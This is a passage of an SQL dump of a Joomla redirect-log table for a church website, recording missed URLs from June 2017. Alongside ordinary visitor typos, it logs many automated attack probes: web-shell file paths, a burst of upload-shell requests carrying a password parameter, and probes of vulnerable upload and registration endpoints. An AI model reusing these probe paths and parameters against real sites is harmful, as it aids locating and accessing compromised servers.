(5413, 'http://lifeoasisinternationalchurch.org/administration.html', NULL, '', '', 1, 0, '2017-06-07 01:27:29', '0000-00-00 00:00:00', 301),
(5414, 'http://lifeoasisinternationalchurch.org/partnership.html', NULL, '', '', 1, 0, '2017-06-07 04:36:50', '0000-00-00 00:00:00', 301),
(5415, 'http://lifeoasisinternationalchurch.org/wp-mosx.php?x=1', NULL, '', '', 1, 0, '2017-06-07 05:31:01', '0000-00-00 00:00:00', 301),
(5416, 'http://lifeoasisinternationalchurch.org/jm-ajax/upload_file/', NULL, '', '', 2, 0, '2017-06-07 11:50:03', '0000-00-00 00:00:00', 301),
(5417, 'http://lifeoasisinternationalchurch.org/maps.php', NULL, '', '', 1, 0, '2017-06-07 12:55:08', '0000-00-00 00:00:00', 301),
(5418, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/76230', NULL, '', '', 1, 0, '2017-06-07 13:27:13', '0000-00-00 00:00:00', 301),
(5419, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/85967', NULL, '', '', 1, 0, '2017-06-07 13:30:47', '0000-00-00 00:00:00', 301),
(5420, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/94821', NULL, '', '', 2, 0, '2017-06-07 13:33:45', '0000-00-00 00:00:00', 301),
(5421, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/89457', NULL, '', '', 1, 0, '2017-06-07 13:34:57', '0000-00-00 00:00:00', 301),
(5422, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/28587', NULL, '', '', 1, 0, '2017-06-07 13:34:57', '0000-00-00 00:00:00', 301),
(5423, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/41295', NULL, '', '', 1, 0, '2017-06-07 13:48:20', '0000-00-00 00:00:00', 301),
(5424, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/88649', NULL, '', '', 1, 0, '2017-06-07 13:49:43', '0000-00-00 00:00:00', 301),
(5425, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/64163', NULL, '', '', 1, 0, '2017-06-07 13:58:36', '0000-00-00 00:00:00', 301),
(5426, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/67565', NULL, '', '', 1, 0, '2017-06-07 14:38:55', '0000-00-00 00:00:00', 301),
(5427, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/59833', NULL, '', '', 1, 0, '2017-06-07 15:20:28', '0000-00-00 00:00:00', 301),
(5428, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/41529', NULL, '', '', 1, 0, '2017-06-07 15:47:42', '0000-00-00 00:00:00', 301),
(5429, 'http://lifeoasisinternationalchurch.org/language/el-gr/advanced_settings.php', NULL, 'http://lifeoasisinternationalchurch.org/language/el-gr/advanced_settings.php', '', 1, 0, '2017-06-07 17:17:46', '0000-00-00 00:00:00', 301),
(5430, 'http://lifeoasisinternationalchurch.org/advanced_settings.php', NULL, 'http://lifeoasisinternationalchurch.org/advanced_settings.php', '', 1, 0, '2017-06-07 17:18:24', '0000-00-00 00:00:00', 301),
(5431, 'http://lifeoasisinternationalchurch.org/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/cache.php', NULL, 'http://lifeoasisinternationalchurch.org/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/cache.php', '', 1, 0, '2017-06-07 18:25:40', '0000-00-00 00:00:00', 301),
(5432, 'http://lifeoasisinternationalchurch.org/ytt.php', NULL, '', '', 3, 0, '2017-06-07 20:22:54', '0000-00-00 00:00:00', 301),
(5433, 'http://lifeoasisinternationalchurch.org/405.html', NULL, '', '', 166, 0, '2017-06-07 20:33:26', '0000-00-00 00:00:00', 301),
(5434, 'http://lifeoasisinternationalchurch.org/templates/pjo_zonada_free/css/colors/advanced_settings.php', NULL, 'http://lifeoasisinternationalchurch.org/templates/pjo_zonada_free/css/colors/advanced_settings.php', '', 1, 0, '2017-06-07 22:46:27', '0000-00-00 00:00:00', 301),
(5435, 'http://lifeoasisinternationalchurch.org/resources/null', NULL, '', '', 1, 0, '2017-06-07 22:49:38', '0000-00-00 00:00:00', 301),
(5436, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/72863', NULL, '', '', 1, 0, '2017-06-07 22:50:19', '0000-00-00 00:00:00', 301),
(5437, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/54158', NULL, '', '', 1, 0, '2017-06-07 23:21:15', '0000-00-00 00:00:00', 301),
(5438, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/15366', NULL, '', '', 1, 0, '2017-06-07 23:32:27', '0000-00-00 00:00:00', 301),
(5439, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/41755', NULL, '', '', 1, 0, '2017-06-07 23:35:11', '0000-00-00 00:00:00', 301),
(5440, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/34411', NULL, '', '', 1, 0, '2017-06-07 23:53:07', '0000-00-00 00:00:00', 301),
(5441, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/16300', NULL, '', '', 1, 0, '2017-06-08 00:03:36', '0000-00-00 00:00:00', 301),
(5442, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/66060', NULL, '', '', 1, 0, '2017-06-08 00:07:38', '0000-00-00 00:00:00', 301),
(5443, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/60462', NULL, '', '', 2, 0, '2017-06-08 00:51:18', '0000-00-00 00:00:00', 301),
(5444, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/90595', NULL, '', '', 2, 0, '2017-06-08 00:58:14', '0000-00-00 00:00:00', 301),
(5445, 'http://www.lifeoasisinternationalchurch.org/template-info/index.php?option=com_content&view=article&id=43&itemid=217', NULL, '', '', 1, 0, '2017-06-08 01:41:09', '0000-00-00 00:00:00', 301),
(5446, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/48095', NULL, '', '', 1, 0, '2017-06-08 02:55:26', '0000-00-00 00:00:00', 301),
(5447, 'http://lifeoasisinternationalchurch.org/indax.php', NULL, '', '', 1, 0, '2017-06-08 03:52:36', '0000-00-00 00:00:00', 301),
(5448, 'http://www.lifeoasisinternationalchurch.org/?option=com_user&view=register', NULL, 'http://www.lifeoasisinternationalchurch.org/?option=com_user&view=register', '', 8, 0, '2017-06-08 04:38:50', '0000-00-00 00:00:00', 301),
(5449, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php?option=com_easybookreloaded', NULL, '', '', 1, 0, '2017-06-08 04:38:55', '0000-00-00 00:00:00', 301),
(5450, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php/gaestebuch/', NULL, '', '', 1, 0, '2017-06-08 04:38:56', '0000-00-00 00:00:00', 301),
(5451, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/gaestebuch', NULL, '', '', 1, 0, '2017-06-08 04:38:57', '0000-00-00 00:00:00', 301),
(5452, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php?option=com_easygb', NULL, '', '', 1, 0, '2017-06-08 04:38:58', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(5453, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php?option=com_akobook', NULL, '', '', 1, 0, '2017-06-08 04:38:59', '0000-00-00 00:00:00', 301),
(5454, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php?option=com_vitabook', NULL, '', '', 1, 0, '2017-06-08 04:38:59', '0000-00-00 00:00:00', 301),
(5455, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php?option=com_jambook', NULL, '', '', 1, 0, '2017-06-08 04:39:00', '0000-00-00 00:00:00', 301),
(5456, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/component/jambook/', NULL, '', '', 1, 0, '2017-06-08 04:39:01', '0000-00-00 00:00:00', 301),
(5457, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php/component/jambook/', NULL, '', '', 1, 0, '2017-06-08 04:39:01', '0000-00-00 00:00:00', 301),
(5458, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/guestbook/', NULL, '', '', 1, 0, '2017-06-08 04:39:02', '0000-00-00 00:00:00', 301),
(5459, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php/guestbook/', NULL, '', '', 2, 0, '2017-06-08 04:39:03', '0000-00-00 00:00:00', 301),
(5460, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php/gaestebuch', NULL, '', '', 1, 0, '2017-06-08 04:39:04', '0000-00-00 00:00:00', 301),
(5461, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php?option=com_phocaguestbook&id=1', NULL, '', '', 1, 0, '2017-06-08 04:39:05', '0000-00-00 00:00:00', 301),
(5462, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/29-tapping-into-the-anointing-for-increase-2/index.php?option=com_phocaguestbook', NULL, '', '', 1, 0, '2017-06-08 04:39:06', '0000-00-00 00:00:00', 301),
(5463, 'http://www.lifeoasisinternationalchurch.org/perisco', NULL, '', '', 1, 0, '2017-06-08 07:03:46', '0000-00-00 00:00:00', 301),
(5464, 'http://www.lifeoasisinternationalchurch.org/perisc', NULL, '', '', 1, 0, '2017-06-08 07:03:52', '0000-00-00 00:00:00', 301),
(5465, 'http://lifeoasisinternationalchurch.org/path/lndex.php', NULL, 'http://lifeoasisinternationalchurch.org/path/lndex.php', '', 1, 0, '2017-06-08 07:20:00', '0000-00-00 00:00:00', 301),
(5466, 'http://lifeoasisinternationalchurch.org/images/css-class.php', NULL, 'http://lifeoasisinternationalchurch.org/images/css-class.php', '', 1, 0, '2017-06-08 08:33:45', '0000-00-00 00:00:00', 301),
(5467, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/23907', NULL, '', '', 1, 0, '2017-06-08 09:46:02', '0000-00-00 00:00:00', 301),
(5468, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/70544', NULL, '', '', 1, 0, '2017-06-08 10:32:08', '0000-00-00 00:00:00', 301),
(5469, 'http://lifeoasisinternationalchurch.org/user/?view=registration', NULL, 'http://lifeoasisinternationalchurch.org/user/?view=registration', '', 1, 0, '2017-06-08 10:42:11', '0000-00-00 00:00:00', 301),
(5470, 'http://www.lifeoasisinternationalchurch.org/component/users/?view=register', NULL, 'http://www.lifeoasisinternationalchurch.org/component/users/?view=register', '', 2, 0, '2017-06-08 10:47:43', '0000-00-00 00:00:00', 301),
(5471, 'http://lifeoasisinternationalchurch.org/component/users/?view=register', NULL, 'http://lifeoasisinternationalchurch.org/component/users/?view=register', '', 1, 0, '2017-06-08 10:47:44', '0000-00-00 00:00:00', 301),
(5472, 'http://lifeoasisinternationalchurch.org/yt2.php', NULL, '', '', 3, 0, '2017-06-08 12:36:33', '0000-00-00 00:00:00', 301),
(5473, 'http://lifeoasisinternationalchurch.org/gobc 2017', NULL, '', '', 1, 0, '2017-06-08 18:30:23', '0000-00-00 00:00:00', 301),
(5474, 'http://www.lifeoasisinternationalchurch.org/component/user/?view=register', NULL, 'http://www.lifeoasisinternationalchurch.org/component/user/?view=register', '', 1, 0, '2017-06-08 21:15:27', '0000-00-00 00:00:00', 301),
(5475, 'http://lifeoasisinternationalchurch.org/component/user/?view=register', NULL, 'http://lifeoasisinternationalchurch.org/component/user/?view=register', '', 1, 0, '2017-06-08 21:15:28', '0000-00-00 00:00:00', 301),
(5476, 'http://www.lifeoasisinternationalchurch.org/?option=com_user&view=registration', NULL, 'http://www.lifeoasisinternationalchurch.org/?option=com_user&view=registration', '', 1, 0, '2017-06-08 22:50:14', '0000-00-00 00:00:00', 301),
(5477, 'http://www.lifeoasisinternationalchurch.org/?option=com_users&view=register', NULL, 'http://www.lifeoasisinternationalchurch.org/?option=com_users&view=register', '', 1, 0, '2017-06-09 01:49:08', '0000-00-00 00:00:00', 301),
(5478, 'http://www.lifeoasisinternationalchurch.org/component/user/?view=registration', NULL, 'http://www.lifeoasisinternationalchurch.org/component/user/?view=registration', '', 1, 0, '2017-06-09 04:53:02', '0000-00-00 00:00:00', 301),
(5479, 'http://lifeoasisinternationalchurch.org/component/user/?view=registration', NULL, 'http://lifeoasisinternationalchurch.org/component/user/?view=registration', '', 1, 0, '2017-06-09 04:53:03', '0000-00-00 00:00:00', 301),
(5480, 'http://lifeoasisinternationalchurch.org/index1.php', NULL, 'http://lifeoasisinternationalchurch.org/index1.php', '', 1, 0, '2017-06-09 07:07:55', '0000-00-00 00:00:00', 301),
(5481, 'http://lifeoasisinternationalchurch.org/images/css-font.php', NULL, 'http://lifeoasisinternationalchurch.org/images/css-font.php', '', 1, 0, '2017-06-09 07:10:03', '0000-00-00 00:00:00', 301),
(5482, 'http://lifeoasisinternationalchurch.org/templates/patrachess/bootstrap/css/advanced_settings.php', NULL, 'http://lifeoasisinternationalchurch.org/templates/patrachess/bootstrap/css/advanced_settings.php', '', 1, 0, '2017-06-09 08:16:52', '0000-00-00 00:00:00', 301),
(5483, 'http://lifeoasisinternationalchurch.org/logs/of7vv/advanced_settings.php', NULL, 'http://lifeoasisinternationalchurch.org/logs/of7vv/advanced_settings.php', '', 1, 0, '2017-06-09 10:09:05', '0000-00-00 00:00:00', 301),
(5484, 'http://lifeoasisinternationalchurch.org/defined.php', NULL, 'http://lifeoasisinternationalchurch.org/defined.php', '', 1, 0, '2017-06-09 10:24:36', '0000-00-00 00:00:00', 301),
(5485, 'https://www.lifeoasisinternationalchurch.org/accomodation', NULL, '', '', 1, 0, '2017-06-09 10:39:29', '0000-00-00 00:00:00', 301),
(5486, 'http://www.lifeoasisinternationalchurch.org//wp-admin/admin-ajax.php', NULL, '', '', 1, 0, '2017-06-09 14:05:42', '0000-00-00 00:00:00', 301),
(5487, 'http://www.lifeoasisinternationalchurch.org/loic//wp-admin/admin-ajax.php', NULL, '', '', 1, 0, '2017-06-09 14:05:45', '0000-00-00 00:00:00', 301),
(5488, 'http://lifeoasisinternationalchurch.org/loic/newsletter.php', NULL, '', '', 1, 0, '2017-06-09 15:49:44', '0000-00-00 00:00:00', 301),
(5489, 'http://lifeoasisinternationalchurch.org/accomodation', NULL, '', '', 1, 0, '2017-06-09 17:38:27', '0000-00-00 00:00:00', 301),
(5490, 'http://lifeoasisinternationalchurch.org/accommodation', NULL, '', '', 1, 0, '2017-06-09 17:38:36', '0000-00-00 00:00:00', 301),
(5491, 'http://www.lifeoasisinternationalchurch.org/gobc', NULL, '', '', 1, 0, '2017-06-09 18:11:30', '0000-00-00 00:00:00', 301),
(5492, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_registration', NULL, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_registration', '', 8, 0, '2017-06-09 19:23:28', '0000-00-00 00:00:00', 301),
(5493, 'http://lifeoasisinternationalchurch.org/x.php', NULL, '', '', 2, 0, '2017-06-09 22:48:52', '0000-00-00 00:00:00', 301),
(5494, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/18-wifi-zion/36-wife-of-vip-s-outlines', NULL, '', '', 12, 0, '2017-06-09 23:04:10', '0000-00-00 00:00:00', 301),
(5495, 'http://lifeoasisinternationalchurch.org/tmp/sfx.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:35:15', '0000-00-00 00:00:00', 301),
(5496, 'http://lifeoasisinternationalchurch.org/m.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:35:24', '0000-00-00 00:00:00', 301),
(5497, 'http://lifeoasisinternationalchurch.org/ny.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:35:26', '0000-00-00 00:00:00', 301),
(5498, 'http://lifeoasisinternationalchurch.org/media/jss.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:35:30', '0000-00-00 00:00:00', 301),
(5499, 'http://lifeoasisinternationalchurch.org/media/css.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:35:32', '0000-00-00 00:00:00', 301),
(5500, 'http://lifeoasisinternationalchurch.org/nktt.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:35:35', '0000-00-00 00:00:00', 301),
(5501, 'http://lifeoasisinternationalchurch.org/zibi.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:35:37', '0000-00-00 00:00:00', 301),
(5502, 'http://lifeoasisinternationalchurch.org/u.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:35:42', '0000-00-00 00:00:00', 301),
(5503, 'http://lifeoasisinternationalchurch.org/ws0.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:35:45', '0000-00-00 00:00:00', 301),
(5504, 'http://lifeoasisinternationalchurch.org/active.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:35:51', '0000-00-00 00:00:00', 301),
(5505, 'http://lifeoasisinternationalchurch.org/help.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 2, 0, '2017-06-09 23:36:10', '0000-00-00 00:00:00', 301),
(5506, 'http://lifeoasisinternationalchurch.org/tmp/pz.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:36:19', '0000-00-00 00:00:00', 301),
(5507, 'http://lifeoasisinternationalchurch.org/go.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:36:22', '0000-00-00 00:00:00', 301),
(5508, 'http://lifeoasisinternationalchurch.org/wp-configuration.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 2, 0, '2017-06-09 23:36:27', '0000-00-00 00:00:00', 301),
(5509, 'http://lifeoasisinternationalchurch.org/libraries/joomla/css.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 2, 0, '2017-06-09 23:36:30', '0000-00-00 00:00:00', 301),
(5510, 'http://lifeoasisinternationalchurch.org/b1.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 2, 0, '2017-06-09 23:36:51', '0000-00-00 00:00:00', 301),
(5511, 'http://lifeoasisinternationalchurch.org/mide.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 2, 0, '2017-06-09 23:36:56', '0000-00-00 00:00:00', 301),
(5512, 'http://lifeoasisinternationalchurch.org/default_component.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:37:10', '0000-00-00 00:00:00', 301),
(5513, 'http://lifeoasisinternationalchurch.org/media/jmail.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:37:25', '0000-00-00 00:00:00', 301),
(5514, 'http://lifeoasisinternationalchurch.org/hh.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:37:43', '0000-00-00 00:00:00', 301),
(5515, 'http://lifeoasisinternationalchurch.org/up14.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:38:01', '0000-00-00 00:00:00', 301),
(5516, 'http://lifeoasisinternationalchurch.org/nuyx9p.php', NULL, '', '', 1, 0, '2017-06-09 23:38:29', '0000-00-00 00:00:00', 301),
(5517, 'http://lifeoasisinternationalchurch.org/wp-installation.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:38:39', '0000-00-00 00:00:00', 301),
(5518, 'http://lifeoasisinternationalchurch.org/e.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:38:45', '0000-00-00 00:00:00', 301),
(5519, 'http://lifeoasisinternationalchurch.org/jijle3.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:38:47', '0000-00-00 00:00:00', 301),
(5520, 'http://lifeoasisinternationalchurch.org/xup.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:38:50', '0000-00-00 00:00:00', 301),
(5521, 'http://lifeoasisinternationalchurch.org/zebda.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:38:51', '0000-00-00 00:00:00', 301),
(5522, 'http://lifeoasisinternationalchurch.org/kk.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:38:59', '0000-00-00 00:00:00', 301),
(5523, 'http://lifeoasisinternationalchurch.org/wp_logns.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=', NULL, '', '', 1, 0, '2017-06-09 23:39:02', '0000-00-00 00:00:00', 301),
(5524, 'http://lifeoasisinternationalchurch.org//jm-ajax/upload_file', NULL, '', '', 1, 0, '2017-06-10 08:45:34', '0000-00-00 00:00:00', 301),
(5525, 'http://lifeoasisinternationalchurch.org/resources/private/live-streaming/', NULL, '', '', 2, 0, '2017-06-10 08:48:31', '0000-00-00 00:00:00', 301),
(5526, 'http://lifeoasisinternationalchurch.org/resources/private-streaming/', NULL, '', '', 1, 0, '2017-06-10 08:49:10', '0000-00-00 00:00:00', 301),
(5527, 'http://lifeoasisinternationalchurch.org/videos/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-06-10 09:58:16', '0000-00-00 00:00:00', 301),
(5528, 'http://lifeoasisinternationalchurch.org/private streaming', NULL, '', '', 3, 0, '2017-06-10 10:07:52', '0000-00-00 00:00:00', 301),
(5529, 'http://www.lifeoasisinternationalchurch.org/stewar', NULL, '', '', 1, 0, '2017-06-10 13:38:18', '0000-00-00 00:00:00', 301),
(5530, 'http://www.lifeoasisinternationalchurch.org/stew', NULL, '', '', 1, 0, '2017-06-10 13:38:18', '0000-00-00 00:00:00', 301),
(5531, 'http://www.lifeoasisinternationalchurch.org/stewa', NULL, '', '', 1, 0, '2017-06-10 13:38:18', '0000-00-00 00:00:00', 301),
(5532, 'http://www.lifeoasisinternationalchurch.org/ste', NULL, '', '', 1, 0, '2017-06-10 13:38:18', '0000-00-00 00:00:00', 301),
(5533, 'http://www.lifeoasisinternationalchurch.org/gobc2017)', NULL, '', '', 1, 0, '2017-06-10 20:20:08', '0000-00-00 00:00:00', 301),
(5534, 'https://www.lifeoasisinternationalchurch.org/gobc2071', NULL, '', '', 1, 0, '2017-06-10 20:48:40', '0000-00-00 00:00:00', 301),
(5535, 'http://www.lifeoasisinternationalchurch.org/contact.php', NULL, '', '', 1, 0, '2017-06-10 21:00:22', '0000-00-00 00:00:00', 301),
(5536, 'http://lifeoasisinternationalchurch.org/5dc935ee3fe96098f0b7f87901e5bdf86b555295/?action=evt-pagehide&args=false&ts=1497181408915', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2017-06-11 11:43:27', '0000-00-00 00:00:00', 301),
(5537, 'http://www.lifeoasisinternationalchurch.org/daughters of destiny outreach', NULL, '', '', 2, 0, '2017-06-11 16:21:39', '0000-00-00 00:00:00', 301),
(5538, 'http://www.lifeoasisinternationalchurch.org/streamingte', NULL, '', '', 1, 0, '2017-06-11 20:33:56', '0000-00-00 00:00:00', 301),
(5539, 'http://www.lifeoasisinternationalchurch.org/streaminge', NULL, '', '', 1, 0, '2017-06-11 20:34:16', '0000-00-00 00:00:00', 301),
(5540, 'http://lifeoasisinternationalchurch.org/modules/mod_rokajaxsearch/themes/dark/extrl.php', NULL, 'http://lifeoasisinternationalchurch.org/modules/mod_rokajaxsearch/themes/dark/extrl.php', '', 1, 0, '2017-06-11 20:57:55', '0000-00-00 00:00:00', 301),
(5541, 'https://www.spiritmeat.net/about-us/broadcast-schedule', NULL, '', '', 1, 0, '2017-06-12 07:53:33', '0000-00-00 00:00:00', 301),
(5542, 'https://www.spiritmeat.net/about-us/testimonies', NULL, '', '', 1, 0, '2017-06-12 07:53:36', '0000-00-00 00:00:00', 301),
(5543, 'http://lifeoasisinternationalchurch.org/globc2017', NULL, '', '', 1, 0, '2017-06-12 15:57:34', '0000-00-00 00:00:00', 301),
(5544, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/6', NULL, '', '', 10, 0, '2017-06-12 21:26:29', '0000-00-00 00:00:00', 301),
(5545, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/7', NULL, '', '', 8, 0, '2017-06-13 04:01:41', '0000-00-00 00:00:00', 301),
(5546, 'https://www.spiritmeat.net/partnership/22-joomla/11-music-is-food-for-the-soul', NULL, '', '', 1, 0, '2017-06-13 08:14:04', '0000-00-00 00:00:00', 301),
(5547, 'https://www.spiritmeat.net/partnership/22-joomla/8-you-only-live-once-live-well', NULL, '', '', 1, 0, '2017-06-13 08:14:07', '0000-00-00 00:00:00', 301),
(5548, 'http://lifeoasisinternationalchurch.org/adoni.php', NULL, '', '', 1, 0, '2017-06-13 12:04:28', '0000-00-00 00:00:00', 301),
(5549, 'http://lifeoasisinternationalchurch.org/wp-sbb.php', NULL, '', '', 1, 0, '2017-06-13 18:34:57', '0000-00-00 00:00:00', 301),
(5550, 'http://lifeoasisinternationalchurch.org/component/users/index.php?option=com_user&view=register', NULL, 'http://lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', '', 2, 0, '2017-06-13 20:47:23', '0000-00-00 00:00:00', 301),
(5551, 'http://lifeoasisinternationalchurch.org/users/index.php?option=com_user&view=register', NULL, 'http://lifeoasisinternationalchurch.org/users/index.php?option=com_user&view=register', '', 2, 0, '2017-06-13 20:47:24', '0000-00-00 00:00:00', 301),
(5552, 'http://lifeoasisinternationalchurch.org/index.php/template-info-2/the-church', NULL, '', '', 11, 0, '2017-06-14 00:21:51', '0000-00-00 00:00:00', 301),
(5553, 'http://lifeoasisinternationalchurch.org/sfn.php', NULL, '', '', 2, 0, '2017-06-14 11:57:03', '0000-00-00 00:00:00', 301),
(5554, 'http://lifeoasisinternationalchurch.org/models.php', NULL, 'http://lifeoasisinternationalchurch.org/models.php', '', 1, 0, '2017-06-14 13:02:13', '0000-00-00 00:00:00', 301),
(5555, 'http://lifeoasisinternationalchurch.org/customizer.php', NULL, 'http://lifeoasisinternationalchurch.org/customizer.php', '', 1, 0, '2017-06-15 08:03:47', '0000-00-00 00:00:00', 301),
(5556, 'http://www.lifeoasisinternationalchurch.org/streaaming', NULL, '', '', 1, 0, '2017-06-15 09:21:42', '0000-00-00 00:00:00', 301),
